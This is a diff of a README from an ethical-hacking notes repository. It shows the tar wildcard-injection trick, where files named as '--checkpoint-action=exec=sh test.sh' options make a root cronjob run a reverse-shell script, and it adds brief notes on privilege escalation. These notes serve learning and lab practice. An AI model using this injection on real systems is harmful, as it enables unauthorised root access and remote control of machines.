alessandro-ancona/Ethical-Hacking-Reporitory/README.md

 - Create the two input parameter files:

       echo "" > "--checkpoint-action=exec=sh test.sh"
-      echo "" > --checkpoint=1
+      echo "" > "--checkpoint=1"

-- Wait for the reverse shell to be executed via cronjob (hoping for privilege escalation), otherwise execute: `tar archive.tar *`
+Finally wait for the reverse shell to be executed via cronjob (hoping for privilege escalation), otherwise execute: `tar archive.tar *`

 ## Docker exploitation

 # Privilege Escalation

+It is the art of getting root permission on a target machine.
+Once an attacker has properly escalaged his privileges on a victim machine, he has complete control over the system.

 ## Linux PrivEsc

+Several privilege escalation vectors using misconfigured built-in Unix binaries are available at [GTFOBins](https://gtfobins.github.io/).

 ## Windows PrivEsc